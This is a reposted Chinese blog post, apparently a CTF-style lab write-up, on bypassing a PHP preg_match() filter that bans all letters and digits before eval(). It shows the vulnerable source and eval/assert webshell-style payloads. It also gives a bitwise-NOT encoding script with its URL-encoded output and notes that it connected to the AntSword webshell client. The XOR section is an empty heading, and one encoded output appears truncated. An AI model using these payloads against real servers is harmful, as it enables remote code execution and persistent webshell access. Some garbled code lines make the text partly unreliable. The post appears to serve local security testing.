其他分享
首页 > 其他分享> > 取反、异或绕过preg_match()过滤所有字母数字

取反、异或绕过preg_match()过滤所有字母数字

作者:互联网

捞到代码,在本地搭建,源码(rce.php):

 <?php
error_reporting(0);
if(isset($_GET['code'])){
            $code=$_GET['code'];
                    if(strlen($code)>40){
                                        die("This is too Long.");
                                                }
                    if(preg_match("/[A-Za-z0-9]+/",$code)){
                                        die("NO.");
                                                }
                    @eval($code);
}
else{
            highlight_file(__FILE__);
}

?>

在研究bypass之前,先研究一个问题:eval(变量)

 

test.php:

<?php
$a=$_REQUEST[8];
@eval(8);
?>

想通过传参让页面输出phpinfo的界面,第一种方法就是?8=phpinfo();  ps:记得加分号

我尝试了以下?8=$_REQUEST[6];&6=phpinfo() 是不行的,在网上看过一篇WP说eval是PHP的语法组成的一员,所以eval()括号里一定是一个php预定义语法,不能直接是一个变量,说明eval(变量)的时候,变量不能直接写$_REQUEST[8]

而是要写成菜刀流量的形式:

?8=assert(eval($_REQUEST[8]))&8=phpinfo();                  ?8=assert(eval(phpinfo();))

assert()执行单行代码,eval()就是单行代码,经测试payload这样写是可行的。

 

继续看bypass问题:

法一:取反绕过:

<?php
echo urlencode(~'assert');
echo urlencode(~'eval($_REQUEST[8])');?>

结果:
%9E%8C%8C%9A%8D%8B
%9A%89%9E%93%D7%DB%A0%AD%BA%AE%AA%BA%AC%AB%A4%C7%A2%D

试了一下,连接蚁剑是可以的,但是我的蚁剑访问不了远程仓库不知道是什么情况。

 

法2:异或绕过

 

标签:变量,preg,phpinfo,REQUEST,取反,assert,异或,eval,php
来源: https://www.cnblogs.com/hackerone/p/16460066.html